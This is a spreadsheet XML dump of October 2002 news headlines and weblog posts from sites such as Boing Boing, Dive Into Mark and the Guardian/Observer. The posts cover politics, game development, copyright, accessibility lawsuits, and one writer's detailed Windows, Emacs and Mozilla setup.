Date: 2002-10-06T02:28:04+01:00Will the last person to leave the Tory party please turn out the light? *Rachel 
Cooke* scours the land looking for Conservative voters.ï¿½Quizzes[1]ï¿½| Crossword
[2]ï¿½| Interactive guides[3]ï¿½| Steve Bell[4]ï¿½| Weblog[5]ï¿½*Other news and comment
**Met launches new 'sus' patrols*[6][1] http://www.newsisfree.com/quiz/0,7476,349695,00.html
[2] http://www.newsisfree.com/crossword/0,4406,180778,00.html
[3] http://www.newsisfree.com/interactive/0,2759,192055,00.html
[4] http://www.newsisfree.com/cartoons/0,7371,337484,00.html
[5] http://www.newsisfree.com/weblog/0,6798,517233,00.html
[6] http://www.newsisfree.com/Observer/crimedebate/story/0,12079,805631,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528553
Date: Not suppliedGlenn Fleishman's written an open letter to the Infoworld writer who published 
an hysterical ambivalent article[1] about warchalking:     The only place I hear about these stories on warchalking that relate to 
    stealing access from open, but not shared APs -- accidentally shared, I 
    suppose is accurate -- is via law enforcement without any specific 
    locations mentioned, arrests made, or even photos of the offending marks.  Link[2] Discuss[3][1] http://www.infoworld.com/articles/op/xml/02/10/04/021004opethics.xml?s=rss&amp;t=wireless&amp;slot=3
[2] http://80211b.weblogger.com/2002/10/04
[3] http://www.quicktopic.com/boing/H/RkUMBVBT8A3
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597652,215/
Date: 2002-10-06T02:28:03+01:00*World latest: *Osama bin Laden is alive and regularly meeting Mullah Omar, the 
fugitive leader of the Taliban, according to a telephone call intercepted by 
American spy satellites.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528531
Date: Not supplied[IMG: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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597653,215/
Date: 2002-10-06T02:28:02+01:00*Business: *Stockbrokers around the world are braced for a potentially 
calamitous week as alarm mounts over a looming, Thirties-style global financial 
crisis.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597654,215/
Date: 2002-10-06T02:28:01+01:00*Football: *David Seaman to carry on as England goalkeeper when their European 
Championship qualifying programme begins in Slovakia on Saturday.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/05.html#perl_programmers_are_so_cute
Date: 2002-10-05T21:33:22-05:00_Ian Hickson_: #include web-log.txt[1]. â€œI used some of Perl's niftier 
features, such as using method lookup instead of a switch statement for the 
preprocessing instruction dispatching, and exceptions instead of passing error 
codes back and forth.â€ He he. Perl programmers are so cute when they 
imitate Python programmers.[1] http://ln.hixie.ch/?start=1033841933&amp;count=1
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85528777
Date: Not suppliedModern Living is a series of about 100 tiny Flash animations that use 
recursions, gloomy music and simple interactivity to make inarticulate yet 
compelling existentialist morality plays. This stuff is like Philip K Dick 
rendered as a series of five-second interactive animations. I've just killed an 
entire hour on this thing, and now I want to go watch a Pinter play. Link[1] 
Discuss[2] (_Thanks, Rich[3]!_)[1] http://www.hoogerbrugge.com/ml.html
[2] http://www.quicktopic.com/boing/H/RCCGA7ixhETnc
[3] http://www.imparte.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#accessibility_watershed
Date: 2002-10-06T23:41:43-05:00_Law.com_: Suit Over Airlines' Web Sites Tests Bounds of ADA[1]. [via Slashdot: 
Blind User Sues Southwest Over Web Site, Cites ADA[2]]     Gumson and a Miami Beach, Fla.- based disability rights group, Access Now, 
    filed lawsuits in U.S. District Court in Miami in June and July against 
    Dallas- based Southwest and Dallas-based American Airlines under the 
    Americans with Disabilities Act. They are doing so under an untested legal 
    theory. Namely, that ADA provisions on the accessibility of public 
    accommodations to the disabled apply to Internet Web sites just as they do 
    to brick-and-mortar facilities like movie theaters and department stores. Five months ago, I said[3] â€œwithin the next 12 months, all web authoring 
tools will fully embrace CSS, accessibility, and web standards. And I mean 
fully, inside and out, as Macromedia appears to have done here [with 
Dreamweaver MX]. Those tools that do not will simply fall by the wayside. This 
is the new baseline.â€ Seven months to go on that prediction. Tick tock, 
tick tock...[1] http://www.law.com/servlet/ContentServer?pagename=OpenMarket/Xcelerate/View&amp;c=LawArticle&amp;cid=1032128683422&amp;t=LawArticleTech
[2] http://slashdot.org/article.pl?sid=02/10/06/2340204
[3] http://diveintomark.org/archives/2002/05/02.html#the_new_baseline
    dive into mark, May 2, 2002: 
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#all_digital
Date: 2002-10-06T23:38:12-05:00_Slashdot_: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CDâ€”that is, the raw pictures that come straight out 
of their cameras. No other photographer we met with came close.[1] http://slashdot.org/article.pl?sid=02/10/04/1549200&amp;mode=nested&amp;tid=126&amp;threshold=3
[2] http://www.lighttouchimagery.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#central
Date: 2002-10-06T23:30:20-05:00_Michael Barrish_: Home[1]. â€œHad I been given a choice in the matter, I 
would have preferred a name that made people think of things I considered more 
central to my identity, like â€œartistâ€ or â€œintellectualâ€ 
or â€œoutrageously good in bed.â€â€[1] http://oblivio.com/road/02100401.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/06.html#business_card_design
Date: 2002-10-06T23:28:00-05:00_Michael Barrish_: Poem[1]. â€œHere are the 15 most popular Oblivio search 
strings since October 1. I consider it a poem.â€[1] http://oblivio.com/road/02100601.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85531633
Date: Not suppliedThe DoE has announced a high-speed data-transfer that runs on drillpipe, 
through "a 4-inch diameter steel pipe immersed in electrically conductive mud 
at pressures up to 1000 atmospheres, temperatures up to 150 deg C, and with 
vibrational accelerations of hundreds of g's:"     Now, with a high-speed, bi-directional communications link, a drilling 
    system's azimuth, inclination, pressure, temperature, loads and vibration, 
    along with information on rock characteristics near the drill bit, can be 
    evaluated almost instantly. Also, because of the ability to send high-speed 
    data through the drill pipe, technologies once thought unobtainable ï¿½ such 
    as collecting seismic data at the drill bit ï¿½ may now be possible.     With high-resolution seismic data collected "ahead of the bit," operators 
    could steer the drill bit more precisely toward oil- and gas-bearing sweet 
    spots and away from less productive areas. This will enhance the efficiency 
    of oil and gas wells and reduce the number of wells needed to produce a 
    reservoir.  Link[1] Discuss[2] (_via /.[3]_)[1] http://www.fossil.energy.gov/techline/tl_intellipipe.shtml
[2] http://www.quicktopic.com/boing/H/VRj5gZXZSGT
[3] http://slashdot.org
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613669,159/
Date: 2002-10-06T18:12:51+01:00Scripting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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613671,159/
Date: 2002-10-06T18:12:49+01:00Armed with a cult film licence and the knowledge that The Italian Job already 
had a huge fan base in the UK, Pixelogic set out to make a game that would not 
only do the film justice but would also be a game worth playing.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8616191,1440/
Date: Not suppliedThe killer T cells of HIV patients who stay healthy for years replicate 
unusually rapidly, researchers discover - better treatments may result
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613670,159/
Date: 2002-10-06T18:12:50+01:00As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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8605373,1440/
Date: Not suppliedPlastic discs designed to sit inside food packaging and change colour when the 
contents go off could provide warnings to consumers
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622122,215/
Date: 2002-10-07T03:52:54+01:00*Arts:* Medieval religious images salvaged from the destruction wrought during 
the reign of Henry VIII reign and the civil war go on show in Leeds.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613673,159/
Date: 2002-10-06T18:12:47+01:00Security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weï¿½ll still 
strive to stamp out corruption, but our system failure threshold is more 
achievable than one might at first assume.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613676,159/
Date: 2002-10-06T18:12:44+01:00We in the game industry know what we mean when we say that a game is 
"addictive." We think that quality in a game is a good thing: people like it, 
they keep coming back to it, and they want to play it more and more. I agree 
that it's a good thing. If a game has that quality, then it's probably a darn 
good game. But using the word "addiction" to describe that quality does us no 
favors with the general public.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613664,159/
Date: 2002-10-06T18:12:56+01:00In the second of our series from the GDC Europe, we talk with Microsoft's Bill 
Fulton about usability testing for games, SCEE's Zeno Colaco about pitching 
publishers, and Harvey Smith of Ion Storm about emergent game design.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613674,159/
Date: 2002-10-06T18:12:46+01:00Back when 64KB was more memory than any computer would ever need, there was a 
time when memory managers didnï¿½t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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85531549
Date: Not suppliedPro football players are addicted to football games, as a means of 
wish-fulfillment -- by "managing" the team, they can be free of the rule of 
their coaches and bosses. Maybe this explains the amazing success of The Sims, 
which, on the face of it, should be dull as hell: While away your free time 
away from the office by simulating an existence as a shlub with a day-job and a 
drive to acquire consumer goods on credit. You'd think it'd be the last thing 
you want to do. But it's not. When you're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Krusty-O's at the 
supermarket and asks where he can find the "Burns-O's."     "It's always a trip," Carr says. "The first time I saw myself in a video 
    game was in college (at Fresno State) when I walked into a Best Buy store 
    and some kid was playing with me. That kind of trips you out a little bit." 
        For every 12-year-old kid who spends countless hours in front of a 
    television playing video games, there's a group of 300-pound offensive 
    linemen challenging each other at everything from Madden NFL 2003 to the 
    action-packed "Halo: Combat Evolved."  Link[1] Discuss[2] (_Thanks, Lawrence[3]!_)[1] http://www.chron.com/cs/CDA/story.hts/sports/1604474
[2] http://www.quicktopic.com/boing/H/XWcdy9AcBAh
[3] http://www.io.com/~lawrence
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613663,159/
Date: 2002-10-06T18:12:57+01:00In our final round-up from the GDC Europe 2002, we review the confernece 
sessions and the ECTS expo, noting the spiraling increase in game complexity.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613662,159/
Date: 2002-10-06T18:12:58+01:00In 1986, we in the U.S. were playing the Nintendo Entertainment System (known 
as the Famicom in Japan), and roughly a third of the music for its first set of 
games was written by Hirokazu "Hip" Tanaka, then with Nintendo Co. Ltd.He has 
written music for countless other games as well as designing the Game Boy 
Camera and Printer, and also scored the soundtrack to the Pokemon TV series. 
Alexander Brandon catches up with the legendary composer.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613665,159/
Date: 2002-10-06T18:12:55+01:00In the first of a two-part series of interviews from the GDC Europe, we talk 
with Mark Cerny about game preproduction, Jonty Barnes about camera control, 
and Jason Kingsley about ratings and censorship.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613675,159/
Date: 2002-10-06T18:12:45+01:00This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</si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622119,215/
Date: 2002-10-07T03:52:57+01:00*UK latest: *Blunkett and Straw accused of trying to intimidate judge as 
Shayler case starts today at Old Bailey.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613667,159/
Date: 2002-10-06T18:12:53+01:00Ubi China had always wanted to make a PC game for the local market, but a 
number to factors kept the idea on hold. In January 2001, the right incentive 
to motivate Ubi China to try a local project finally arrived: the license for 
"Music Up", a popular animated property.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85531557
Date: Not suppliedDisney's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Discuss[2][1] http://www.latimes.com/business/la-fi-disney6oct06,0,1287712.story?coll=la%2Dheadlines%2Dbusiness%2Dmanual
[2] http://www.quicktopic.com/boing/H/iewxPJy39cF7
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613678,159/
Date: 2002-10-06T18:12:42+01:00Troy Paradise is a versatile and creative artist with over seven years of 
experience in the videogames industry, working as a freelance lead artist and 
college art instructor.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613660,159/
Date: 2002-10-06T18:13:00+01:00ï¿½But industry analysts sayï¿½ï¿½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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613661,159/
Date: 2002-10-06T18:12:59+01:00Rendering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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613666,159/
Date: 2002-10-06T18:12:54+01:00With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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613672,159/
Date: 2002-10-06T18:12:48+01:00For those new to the product, Virtools is a production environment (such as 
Director) designed to allow the rapid creation of 3D-interactive 
applications.The second version of Virtools clearly builds upon previous 
releases, keeping a similar look while adding a host of new features that 
greatly improve the final package.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613677,159/
Date: 2002-10-06T18:12:43+01:00Max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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000640
Date: 2002-10-06T21:28:33-06:00Ted Rall: My Government Went to Afghanistan and All I Got Was This Stupid 
Pipeline[1] Summary: The US begun planning courting the Taliban for permission to build an 
oil pipeline since 1997. We even flew Mullah Omar to Texas to try and convince 
him. After it was clear that wouldn't work, we threatened to bomb them and 
begun attacking on a smaller scale for a year before 9-11. We already planned 
to invade two months before the attacks. While it's not clear they knew about 
9-11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it's too expensive and will be sabotaged by warlords and Pakistan. Bin Laden was essentially a venture capitalist: he funded attacks but didn't 
carry them out. It's far more likely that an Egyptian group, Islamic Jihad, 
carried out the attacks. If we wanted to stop the terrorists, we should have 
gone after them. If we wanted to stop anti-Americanism,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it."[1] http://www.comicbookgalaxy.com/pipeline0.html
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613679,159/
Date: 2002-10-06T18:12:41+01:00Rendering engines used in todayï¿½s game titles utilize various techniques for 
hidden surface removal (HSR), different techniques being suitable for different 
game genres. For example, action games played in closed-in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
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613668,159/
Date: 2002-10-06T18:12:52+01:00As audiences become more and more sophisticated about computer graphics, 
fractal noise and procedural woodgrain textures can no longer guarantee gushing 
reviews. Darkling Simulationsï¿½ Darktree 2 is the latest edition of the popular 
tool for artists who want to develop complex, multilayered shaders ranging from 
highly realistic natural surfaces to animated pyrotechnics to flatshaded 
cartoon renderings.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622116,215/
Date: 2002-10-07T03:53:00+01:00Iain Duncan Smith will this week gamble his political future on a return to the 
Thatcher revolution of the 80s.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622117,215/
Date: 2002-10-07T03:52:59+01:00French ship burns off Yemen.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622123,215/
Date: 2002-10-07T03:52:53+01:00*Business:* Abbey National has received a takeover approach from Bank of 
Ireland which could flush out other bidders.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622118,215/
Date: 2002-10-07T03:52:58+01:0036 million pheasants now reared for Britain's fastest growing 'sport'.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622124,215/
Date: 2002-10-07T03:52:52+01:00*Education:* A 19-year-old student becomes the first person to take legal 
action over this year's A-level crisis.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622125,215/
Date: 2002-10-07T03:52:51+01:00*Football:* Ugo Ehiogu will stand in for Rio Ferdinand following his sudden and 
unexpected withdrawal from the England squad.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622126,215/
Date: 2002-10-07T03:52:50+01:00*Money:* Pensions experts say tax lures should be used to raise retirement age.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8628741,215/
Date: 2002-10-07T09:29:58+01:00*Politics:* Stormont near collapse as Sinn Fein protests at allegations.
</t>
  </si>
  <si>
    <t>URL: http://www.aaronsw.com/weblog/000644
Date: 2002-10-08T01:21:33-06:00DeCSS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t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85537483
Date: Not suppliedHere's a how-to explaining how to blind a surveillance camera a laser-pointer. 
Link[1] Discuss[2] (_Thanks, Mike[3]!_)[1] http://www.naimark.net/projects/zap/howto.html
[2] http://www.quicktopic.com/boing/H/MMYu4tp9w54
[3] http://www.objectif.org
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534163
Date: Not suppliedNTT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one's pocket, the paper said.     In this way, people can exchange e-mail addresses, names and phone numbers 
    while shaking hands, with the data automatically written into both their 
    PDAs, the paper said.  Link[1] Discuss[2] (_Thanks, Alan!_)[1] http://www.news.com.au/common/story_page/0,4057,5239758%255E13762,00.html
[2] http://www.quicktopic.com/boing/H/tFBrRGn3CvLk9
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534676
Date: Not suppliedI spoke at the Mac OS X conference in Santa Clara last week. It was a really 
fun event, and it was great meeting a lot of people whom I previously knew only 
through email, like Rael Dornfest, Danny O'Brien, and Glenn Fleishman. Here's 
the talk I gave. Link[1] Discuss[2][1] http://boingboing.net/gadgets.html
[2] http://www.quicktopic.com/16/H/SLVudz57pyHb
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/07.html#my_good_easy
Date: 2002-10-07T17:59:05-05:00_Joe Gregorio_: My next pet project[1]. â€œTrying to re-create the "Good 
Easy[2]" on a Windows machine.â€ I have also made half-hearted attempts in 
this direction, as I am forced to use Windows during the day. I say 
half-hearted because I'm still application-centric, and I don't go as far with 
keyboard shortcuts as I could. But I don't use the desktop at all (never have, 
on any system), and I don't use ctrl alt keyboard shortcuts because I 
personally find them awkward (YMMV). If you must use Windows, the first step 
towards a productive system is managing your Start menu. I use the main level of the Start menu with numbered shortcuts to my most 
common programs. "0 Control Panel[3]", "1 Mozilla[4]", "2 Emacs[5]", "3 DOS 
home", "4 DOS work", "5 DOS incoming" (each of which gives me a command line, 
but in different directories), "7 Python[6]", "9 IE". Also "# Explorer home", 
"$ Explorer work", "% Explorer incoming", which open Explorer windows in 
various useful directories (the same directories as the DOS shortcuts, only 
with the shift key held down, and yes, I intentionally set it up so that $ went 
to my work folder). Less-used programs are taken out of their useless submenus 
(as installed) and moved directly into the Programs submenu and given unique 
first letters as needed. "Ad-aware[7]", "Excel[8]", "IM", "Netscape 4[9]", 
"Paint Shop Pro", "Query Tool (ODBC)[10]", "VMWare[11]", "Word[12]". All other 
submenus except Startup are removed from the Programs menu. (Yes, delete 
"Accessories". Do you honestly ever use it? If so, it's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4 gives me a 
new command prompt in my work directory. Menu P N runs Netscape 4 (for 
compatibility testing in my day job, ugh). Mozilla and Emacs are almost always 
open, but I quit lesser-used applications as soon as I'm done using them 
(mostly because my laptop doesn't have a lot of memory). I install Cygwin[13] so that the command line is actually useful. Cygwin is a 
collection of Windows ports of all your favorite UNIX utilities, including mv, 
cp, scp, ssh, man, tar, less, grep, patch, ncftp, cvs, and many others. And 
bash, which I don't use because I dislike how it handles Windows pathnames. I 
also set the properties of my command line shortcuts to set the window size to 
120 x 50 (almost full screen at 1024 x 768), and screen buffer size to 120 x 
3000. Set window position at 0 x 0, and don't let the system position the 
window. In Mozilla, I set my home page to "about:blank", set Internet Search to search 
with Google, use Tabbed Browsing, open tabs instead of windows in all possible 
cases, always show the tab bar, and load links in the background (essential for 
weblog surfing, you can ctrl click links to open them in new tabs in the 
background). Under Scripts &amp; Plugins, I do not allow scripts to open 
unrequested windows. I turn off the sidebar, turn on the Site Navigation Bar, 
delete all pre-installed bookmarks, and create two bookmarks: one which takes 
me to my webmail, and another which takes me to my internal site search[14], 
from which I can find all other bookmarks I need. In Internet Explorer, I set my home page to the page to edit my weblog, since 
that's the only thing I do in Internet Explorer. alt tab back and forth between 
Mozilla and IE is easier than ctrl pgup/pgdown between tabs within Mozilla, 
since TEXTAREAs in Mozilla lose focus when you switch tabs, making copying and 
pasting weblog entries virtually impossible. I use Emacs locally and vi remotely, because the default behavior of Emacs is 
so heinous as to render it unusable. (For instance, editing a CGI script named 
foo.cgi on a web server with Emacs would generate a foo.cgi~ backup file, which 
is world-readable and is sent as plain text to any browser that asks. Try this 
sometime on your favorite web site.) Among other things, my .emacs file (which 
is actually called _emacs on Windows) instructs Emacs to store all backup files 
in a single directory (d:\backup); to treat all XML files as DocBook, all CGI 
scripts as Python, and all SQL scripts as PL/SQL; to use Cygwin's bash shell 
for M-x-shell; to use a single maximized frame with no menubar, titled as the 
name of the current file; to show column numbers; to accept "y" and "n" for 
yes/no questions; not to blink; not to beep; and to close the current file when 
I press M-w. I use some weird registry hacks and a hacked notepad.exe to get 
all text files to open in Emacs. (I got this idea from Ultraedit[15].) My 
_emacs file is my second most backed-up possession. I don't use Windows' useless directory structure for user home directories. On 
my D drive I have d:\home (contains directories for my books and other personal 
projects, each under CVS controlâ€”also set as my home directory using the 
HOME environment variable), d:\work (contains directories for each work 
project, also under CVS), d:\incoming (set as default download directory for 
all programs that download things), and d:\backup (used by Emacs, and for 
temporary storage, for instance for storing originals when checking out newly 
created CVS projects). I don't know or care what's where on my C drive. I have tried many, many address books, and still store all my contacts, email 
addresses, snail mail addresses, phone numbers, and other vital personal 
information in a text file called phone, stored in d:\home\phone. It is not in 
any particular format, other than being plain text and usually including blank 
lines between entries. I categorize people with simple keywords in parentheses 
after their name, and use M-x-occur in Emacs to search by keyword. This file is 
my single most backed-up possession. Other essential free Windows utilities I use (in no particular order): TweakUI
[16], Cygwin[17], Guidescope[18], ZoneAlarm[19].[1]  http://bitworking.org/Oct2002.html#X631695997519494480
[2]  http://www.winterspeak.com/columns/082001.html
[3]  http://www.annoyances.org/exec/show/article02-013
[4]  http://www.mozilla.org/
[5]  http://www.gnu.org/software/emacs/windows/ntemacs.html
[6]  http://www.activestate.com/Products/ActivePython/
[7]  http://www.lavasoftusa.com/
[8]  http://www.openoffice.org/
[9]  http://sillydog.org/narchive/
[10] http://gpoulose.home.att.net/
[11] http://www.vmware.com/
[12] http://www.openoffice.org/
[13] http://www.cygwin.com/
[14] http://diveintomark.org/mt/mt-search.cgi
[15] http://www.ultraedit.com/downloads/index.html#notepad
     Replacing Notepad with Ultraedit-32
[16] http://www.microsoft.com/ntworkstation/downloads/PowerToys/Networking/NTTweakUI.asp
[17] http://www.cygwin.com/
[18] http://www.guidescope.com/
[19] http://download.com.com/3000-2092-10039884.html?part=zonealarm&amp;subj=dlpage
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000641
Date: 2002-10-07T15:55:20-06:00Eric Eldred _himself_ was just on Marketplace[1]. NYTimes: Debate to Intensify on Copyright Extension Law[2] (front page of the 
business section, below the fold). "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ï¿½ and the 
technology companies that are often in the middle." Newsweek: Glitterati vs. Geeks[3]. "Larry Lessig admits it: heï¿½s nervous. Who 
wouldnï¿½t be? [...] In its narrowest context, Eldred v. Ashcroft deals with the 
seemingly arcane issue of the length of copyrights for books, films and music. 
But itï¿½s actually a high-noon showdown between two great industries at odds in 
the age of the Internet." 'Thereï¿½s a sense of deja vu to this. Television was 
supposed to be the death of movies. And in 1982, the film industryï¿½s 
silver-tongued lobbyist Jack Valenti testified that ï¿½the VCR is to the American 
film producer and the American public as the Boston strangler is to the woman 
home alone.ï¿½ (Video sales are now the studiosï¿½ biggest moneymaker.) Naturally, 
Hollywood regards the computer/Internet combo as scarier than ï¿½Nightmare on Elm 
Street.ï¿½'[1] http://www.marketplace.org/
[2] http://www.nytimes.com/2002/10/07/business/media/07ARGU.html
[3] http://www.msnbc.com/news/817175.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534316
Date: Not suppliedLast Friday's Christie's auction of original physics manuscripts included 
original works by Einstein, Curie, Newton and other physics rock-stars. The 
Einstein (which included an early attempt to prove relativity) went to an 
anonymous bidder for $500,000. Link[1] Discuss[2][1] http://www.sciam.com/article.cfm?chanID=sa003&amp;articleID=0007B1D4-EC91-1D9D-815A809EC5880000
[2] http://www.quicktopic.com/boing/H/uiCM4MRSGBDC
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534853
Date: Not suppliedThis time around, we have _two, two, two_ Guestbloggers for the price of one. 
Quinn Norton and Danny O'Brien have agreed to fill the sidebar slot for a 
little while. Danny and Quinn and their rommie Gilbert are just about the most 
fun Bay Areans I've had the pleasure of hanging out with. Between the three of 
them, they're capable of being entertaining on the subjects of Python, 
copyright, pottery, usability (a conversation with Quinn about usability made 
it, almost verbatim, into my second novel "Eastern Standard Tribe"), 
load-balancing, free software, nerd culture, British cuisine, bodily ailments, 
pregnancy... Well, you name it. I can't wait to see what they post! Discuss[1][1] http://www.quicktopic.com/boing/H/NYtiY2fGTe3iE
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655711,215/
Date: 2002-10-08T03:30:55+01:00*Gun violence in America: *A 13-year-old boy was shot in the chest and 
critically wounded outside of his school in Maryland becoming the latest victim 
of a sniper who has already killed six people.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534186
Date: Not suppliedSweatyFrog is a toy-review magazine/store, focusing on collectible toys with 
great, MegoSteve[1]-style erudite toy-otaku commentary. Toy_Design_Guru, who 
suggested the link, recommends their occassional email newsletter as a 
must-read. Link[2] Discuss[3] (_Thanks, Toy_Design_Guru!_)[1] http://www.megosteve.com
[2] http://www.sweatyfrog.com/index2.html
[3] http://www.quicktopic.com/boing/H/WhGgH4sXeVwJN
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000226.html
Date: 2002-10-07T14:07:06-08:00If you like to live on the bleeding edge and play with code that's not yet 
ready for prime-time, good news! You can now get the MySQL 4.1 source tree. The 
only real difference from the 3.23 and 4.0 trees...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655705,215/
Date: 2002-10-08T03:31:01+01:00Tony Blair to hold crisis summit with Ulster Unionist leader David Trimble in 
Downing Street today.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534171
Date: Not suppliedArts and Letters Daily, a wonderful and dense blog, has folded up its tent due 
to the bankruptcy of its parent company. A&amp;L Daily will be auctioned off by the 
receivers. Link[1] Discuss[2] (_Thanks, Misha!_)[1] http://www.aldaily.com/
[2] http://www.quicktopic.com/boing/H/ZLfTeRjnD6Jf
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20021007.html
Date: Not suppliedDelphi Questions[1], a new _Joel on Software_ discussion group.[1] http://discuss.fogcreek.com/delphiquestions
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655707,215/
Date: 2002-10-08T03:30:59+01:00*Simon Hattenstone* meets comedian Lee Evans.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534710
Date: Not suppliedAt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Discuss[2][1] http://metropolismag.com/html/content_1002/ben/ben_a.html
[2] http://www.quicktopic.com/16/H/uUSrEeEuxYWe
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655709,215/
Date: 2002-10-08T03:30:57+01:00*UK latest: *Support for military action against Iraq among British voters has 
fallen to 32%, the lowest level recorded while the Guardian/ICM survey has been 
running.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655716,215/
Date: 2002-10-08T03:30:50+01:00*Feature: *She has loved clothes with a passion all her life. And yet acclaimed 
author *Linda Grant* has never been to the collections - until now. So what 
does she make of the Paris shows?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000225.html
Date: 2002-10-07T12:30:42-08:00For the past week, I've been waiting for one of my FreeBSD servers to reproduce 
a problem we've been seeing with MySQL + LinuxThreads. This particular machine 
is running a custom build of MySQL 4.0.4 (or MySQL 404, as I...
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655708,215/
Date: 2002-10-08T03:30:58+01:00*Politics: *The Conservative leadership yesterday launched itself into a frenzy 
of self-reproach as it struggled to shed the image of Britain's "nasty party".
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8653742,1440/
Date: Not suppliedThe latest "Red List" adds 124 to the 11,000 endangered species around the 
globe - but also includes a stick insect revival
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534142
Date: Not suppliedFeorag writes from Scotland: "You probably haven't heard of John Otway, but he 
has a small and devoted following here. He did a limited issue CD and asked his 
fans to vote on which track _they'd_ like to see as a single. The one they 
picked just entered the UK charts at number 9! Bet that'll piss off the major 
record labels, especially as the marketing budget was probably about zero. I 
